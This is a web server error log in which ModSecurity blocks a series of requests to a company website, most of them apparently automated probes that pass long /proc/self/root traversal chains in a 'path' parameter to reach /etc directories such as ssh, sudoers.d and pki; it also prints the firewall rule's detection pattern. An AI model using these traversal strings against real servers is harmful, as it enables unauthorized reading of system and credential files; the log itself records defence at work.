[Thu Mar 19 04:16:55.857488 2026] [:error] [pid 27403:tid 140411624429312] [client 74.7.241.31:59434] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/lldpd.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui5xkFeYa1D6dYQnC3owAAAc4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:57.205704 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:59440] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui6cdf6f5d65gmYZQ9SAAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:58.529040 2026] [:error] [pid 30077:tid 140411574073088] [client 74.7.241.31:52958] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui6vu8EFLIOrSqIptn7AAAAlQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:16:59.831038 2026] [:error] [pid 27403:tid 140411725141760] [client 74.7.241.31:52966] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui6xkFeYa1D6dYQnC3pQAAAcI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:01.115294 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.241.31:52968] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/httpd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui7eyqAr6etmhZHNotzAAAAFQ"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:01.136374 2026] [:error] [pid 19093:tid 140411641214720] [client 74.7.244.43:57454] [client 74.7.244.43] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "www.bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abui7V_V7PWP6ixUYl6GPwAAAow"]
[Thu Mar 19 04:17:02.746739 2026] [:error] [pid 15826:tid 140411624429312] [client 74.7.241.31:52970] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui7uoXxyEfFpUF8f_a4QAAAU4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:04.111975 2026] [:error] [pid 17887:tid 140411674785536] [client 74.7.241.31:52974] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui8AkwaGbbGflqUZB-awAAAMg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:05.475185 2026] [:error] [pid 31803:tid 140411658000128] [client 74.7.241.31:52978] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/logrotate.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui8eyqAr6etmhZHNot0QAAAEo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:06.752425 2026] [:error] [pid 30077:tid 140411565680384] [client 74.7.241.31:52986] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ssh"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui8vu8EFLIOrSqIptn9QAAAlU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:08.088354 2026] [:error] [pid 19093:tid 140411540502272] [client 74.7.241.31:42038] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui9F_V7PWP6ixUYl6GQgAAApg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:09.407037 2026] [:error] [pid 17887:tid 140411699963648] [client 74.7.241.31:42050] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui9QkwaGbbGflqUZB-cQAAAMU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:10.743116 2026] [:error] [pid 30077:tid 140411624429312] [client 74.7.241.31:42054] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/sudoers.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui9vu8EFLIOrSqIptn-QAAAk4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:12.127797 2026] [:error] [pid 27403:tid 140411683178240] [client 74.7.241.31:42068] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui-BkFeYa1D6dYQnC3rwAAAcc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:13.538326 2026] [:error] [pid 31803:tid 140411666392832] [client 74.7.241.31:42070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui-eyqAr6etmhZHNot3wAAAEk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:14.859115 2026] [:error] [pid 30077:tid 140411733534464] [client 74.7.241.31:42078] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/postfix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui-vu8EFLIOrSqIptn-wAAAkE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:16.145288 2026] [:error] [pid 26799:tid 140411666392832] [client 74.7.241.31:42092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui_Na6ubjKNq_cu4YKwgAAA0k"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:19.871439 2026] [:error] [pid 31803:tid 140411565680384] [client 74.7.241.31:37694] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abui_-yqAr6etmhZHNot4wAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:21.205270 2026] [:error] [pid 26799:tid 140411641214720] [client 74.7.241.31:37704] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ld.so.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujAda6ubjKNq_cu4YKxwAAA0w"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:22.514676 2026] [:error] [pid 17653:tid 140411632822016] [client 74.7.241.31:37708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujAsdf6f5d65gmYZQ9WwAAAs0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:26.054053 2026] [:error] [pid 17653:tid 140411616036608] [client 74.7.241.31:37716] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujBsdf6f5d65gmYZQ9ZQAAAs8"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Thu Mar 19 04:17:31.757920 2026] [:error] [pid 14269:tid 140411683178240] [client 74.7.241.31:32982] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abujCwbLMZ6AikZjR9UnzgAAAAc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
